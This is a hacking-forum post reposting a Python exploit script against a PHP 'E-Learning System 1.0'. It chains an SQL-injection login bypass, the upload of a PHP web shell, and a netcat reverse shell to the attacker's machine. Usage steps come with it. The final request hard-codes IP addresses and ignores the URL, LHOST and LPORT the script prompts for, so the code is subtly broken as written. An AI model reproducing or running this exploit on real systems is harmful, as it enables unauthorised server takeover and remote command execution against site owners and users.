Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

E-Learning System 1.0 - Authentication Bypass

 Share


Recommended Posts

# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE
# Exploit Author: Himanshu Shukla & Saurav Shukla
# Date: 2021-01-15
# Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip
# Version: 1.0
# Tested On: Kali Linux + XAMPP 7.4.4
# Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution

#Step 1: run the exploit in python with this command: python3 exploit.py
#Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/
#Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23
#Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444
#Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444
#Step 6: Hit enter on the  if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter.

import requests

print('########################################################')
print('##                 E-LEARNING SYSTEM 1.0              ##')
print('##   AUTHENTICATION BYPASS & REMOTE CODE EXECUTION    ##')
print('########################################################')

print('Author - Himanshu Shukla & Saurav Shukla')

GREEN =  '\033[32m' # Green Text
RED =  '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
#Create a new session
s = requests.Session() 
  
#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}

LINK=input("Enter URL of The Vulnarable Application : ")

#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"user_email":"'or 1 or'", "user_pass":"lol","btnLogin":""}
r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) 

r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) 

#Check if Authentication was bypassed or not.
logged_in = True if("You login as Administrator." in r.text) else False
l=logged_in
if l:
	print(GREEN+"[+]Authentication Bypass Successful!", RESET)
else:
	print(RED+"[-]Failed To Authenticate!", RESET)


#Creating a PHP Web Shell

phpshell  = {
               'file': 
                  (
                   'shell.php', 
                   '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 
                   'application/x-php', 
                  {'Content-Disposition': 'form-data'}
                  ) 
             }

# Defining value for form data
data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''}



#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False)

shell_upload = True if("window.location='index.php'" in upload.text) else False
u=shell_upload
if u:
	print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
	print(RED+"[-]Failed To Upload The PHP Shell!", RESET)

print("[*]Please Input Reverse Shell Details")
LHOST=input("[*]LHOST : ")
LPORT=input("[*]LPORT : ")

print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT)
input('[*]Hit Enter if your netcat shell is ready. ')
print('[+]Deploying The Web Shell...')


#Executing The Webshell
e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies)

exit()
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...